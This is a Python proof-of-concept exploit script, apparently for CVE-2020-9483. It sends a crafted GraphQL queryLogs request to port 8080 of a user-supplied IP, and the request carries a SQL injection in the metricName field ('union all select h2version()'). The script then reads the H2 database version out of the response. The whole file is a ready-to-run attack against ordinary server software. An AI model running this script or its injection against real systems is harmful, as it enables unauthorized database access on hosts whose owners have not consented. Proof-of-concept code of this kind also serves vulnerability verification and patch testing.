CVE-2020-9483.py

# --CVE-2020-9483-PoC--
# -*- Encoding: utf-8 -*-
import requests
import json
import argparse
import sys
import re


def host():
    try:
        parser = argparse.ArgumentParser(description='PoC for CVE-2020-9483 by shiro', exit_on_error=False)
        parser.add_argument('-ip', required=True)
        args = parser.parse_args()
        ip = str(args.ip)
        #print(ip)
        url = "http://" + ip + ":8080" + "/graphql"
        return url
    except argparse.ArgumentError:
        print("[-]usage:python3 CVE-2020-9483.py -ip 127.0.0.1")
        sys.exit(0)


def poc(url):
    header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',
              'Content-type': 'application/json'
    }
    payload = {"query":"query queryLogs($condition: LogQueryCondition){queryLogs(condition: $condition){total,logs{serviceId,serviceName,isError,content}}}",
               "variables": {"condition": {"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --", "endpointId": "1", "traceId": "1", "state": "ALL", "stateCode": "1", "paging": {"pageSize": 10}}}}
    data = json.dumps(payload)
    #print(data)
    try:
        res = requests.post(url=url, headers=header, data=data, timeout=3)
        print("[+]got response")
    except requests.exceptions.ConnectionError:
        print("[-]timeout :(")
        print("[-]bye~~~")
        sys.exit(0)
    print("[+]SQL Injection complete")
    version = re.findall(r"\d+\.\d+\.\d+", res.text)
    #print(version)
    print("[+]Database version is " + str(version))
    print("[+]Done!")


if __name__ == "__main__":
    poc(host())